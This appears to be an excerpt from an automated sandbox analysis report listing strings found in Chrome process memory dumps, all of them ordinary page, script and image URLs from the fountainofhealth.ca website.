Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2352577508.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329951400.000028EC0663C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341031480.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494918575.000028EC046E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400603614.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329921091.000028EC06930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/en(
Source: chrome.exe, 00000000.00000002.2489230157.000028EC03E54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/en/
Source: chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/en/about-us
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/en/form/contact-us
Source: chrome.exe, 00000000.00000003.2400466181.000028EC07EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361169372.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500209375.000028EC06578000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361252175.000028EC04A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400228006.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/en/home
Source: chrome.exe, 00000000.00000003.2400466181.000028EC07EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361169372.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361252175.000028EC04A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400228006.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/en/node/113
Source: chrome.exe, 00000000.00000003.2385216493.000028EC0682C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385216493.000028EC06828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2360620898.000028EC06828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439458597.000001E4ACC5D000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2486226544.000028EC03934000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2502757759.000028EC06E04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504920631.000028EC07968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439458597.000001E4ACC57000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2341844101.000028EC06828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/en/search/node
Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/en/thrive-c-approach-wellbeing
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/en/thrive/resources
Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/enAgent
Source: chrome.exe, 00000000.00000002.2487549813.000028EC03B90000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/enHome
Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/enL
Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/enb
Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/enca
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/form/contact-us
Source: chrome.exe, 00000000.00000002.2495529652.000028EC04804000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500209375.000028EC06578000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/fr/node/113
Source: chrome.exe, 00000000.00000002.2501264021.000028EC068D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501144025.000028EC06888000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344648335.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505494576.000028EC07B08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/individuals
Source: chrome.exe, 00000000.00000002.2495723401.000028EC04840000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/ipt
Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320046905.000028EC053E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315336209.000028EC06A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491256401.000028EC04045000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3
Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/libraries/json2/json2.js?v=2
Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/libraries/json2/json2.js?v=2misc/dialog.ajax.js?swjs7b
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/modules/ajax_loader/css/throbber-general.css?swjs7b
Source: chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/modules/ajax_loader/css/wave.css?swjs7b
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491256401.000028EC04045000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/modules/views_slideshow/js/views_slideshow.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/modules/views_slideshow/js/views_slideshow.js?v=10.1.0les/views_slidesho
Source: chrome.exe, 00000000.00000002.2496006842.000028EC048C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500106233.000028EC0652C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315393234.000028EC04AF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow
Source: chrome.exe, 00000000.00000002.2495959896.000028EC048B8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490480203.000028EC03F98000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/modules/webform/js/webform.states.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/modules/webform/modules/webform_bootstrap/css/webform_bootstrap.css?swjs
Source: chrome.exe, 00000000.00000002.2495529652.000028EC04804000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472993103.000028EC029B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/n
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496640859.000028EC04998000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/om/
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/organizations
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/our-people-partners
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/our-research
Source: chrome.exe, 00000000.00000002.2491036779.000028EC0402C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/ript
Source: chrome.exe, 00000000.00000003.2385216493.000028EC0682C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2378748801.000028EC03845000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472109476.000028EC02820000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352577508.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505400410.000028EC07AEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329951400.000028EC0663C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2360620898.000028EC06828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500311139.000028EC06614000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341031480.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494918575.000028EC046E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355559517.000028EC0799C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505494576.000028EC07B08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400603614.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329921091.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png
Source: chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/document/Tips%20to%20THRIVE%20-%202024.pdf
Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/FOH_EN_LOGO_Clr2024.svg
Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Info-Blue.png
Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Info-Blue.pngng
Source: chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Message-Blue.png
Source: chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Thrive_infographic_EN3%20%283%29.jpg
Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486476343.000028EC039A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-e_1.png
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-h_1.png
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482432826.000028EC03468000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-i_1.png
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488508263.000028EC03CD0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-r_1.png
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2469175116.000028EC023AC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-t_2.png
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-v_1.png
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/facebook-t.svg
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/facebook-t.svggdler
Source: chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488508263.000028EC03CD0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/facebook.svg
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/foh-logo%203.svg
Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/foh-logo%203.svgHandler
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-1-300_6.png
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-E-300_6.png
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-H-300_6.png
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-R-300_6.png
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-T-300_7.png
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485845268.000028EC0387C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-V-300_6.png
